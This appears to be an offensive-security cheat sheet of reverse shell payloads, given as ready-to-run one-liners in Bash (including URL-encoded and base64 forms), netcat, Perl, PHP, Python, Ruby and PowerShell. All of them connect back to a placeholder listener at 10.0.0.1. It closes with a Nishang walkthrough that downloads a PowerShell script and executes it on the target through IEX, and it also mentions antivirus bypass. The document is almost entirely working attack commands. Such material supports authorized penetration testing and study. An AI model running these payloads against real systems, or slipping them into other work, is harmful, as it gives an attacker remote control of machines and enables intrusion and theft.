Reverse Shell Cheat Sheet

First of all, we need to start a listener in local machine to get an incoming connection.

nc -lvnp 4444

Copied!

Bash

bash -i >&  /dev/tcp/10.0.0.1/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'

# For URL param
/?q=bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261
/?q=`bash+-c+'bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261'`

Copied!

with Base64

Execute the following commands in target machine.

echo "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" | base64
echo <base64_string> | base64 -d | bash

Copied!

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

Copied!

Ncat

ncat 10.0.0.1 4444 -e /bin/bash
ncat 10.0.0.1 4444 -e /bin/sh
ncat 10.0.0.1 4444 -c bash
ncat --udp 10.0.0.1 4444 -e /bin/bash

nc 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/sh
nc 10.0.0.1 4444 -c bash
nc --udp 10.0.0.1 4444 -e /bin/bash

Copied!

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Copied!

PHP

php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Copied!

Python

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Copied!

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Copied!

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Copied!

Bypass Antivirus

• powercat

Nishang

Nishang is the Offensive PowerShell for red team, penetration testing and offensive security.

1. Preparing the Payload in Your Local Machine

First off, copy the payload to the current working directory.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Copied!

Add the following code to the final line in the payload (shell.ps1).

Invoke-PowerShellTcp -Reverse  -IPAddress <your-local-ip> -Port 4444

Copied!

2. Opening Wev Server in Your Local Machine

To download the payload and execute the reverse shell in the target machine, open the web server in your local machine.

python3 -m http.server 8000

Copied!

3. Downloading the Payload and Executing Reverse Shell

In the target machine, download the local-hosted payload and run reverse shell.

cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')

Copied!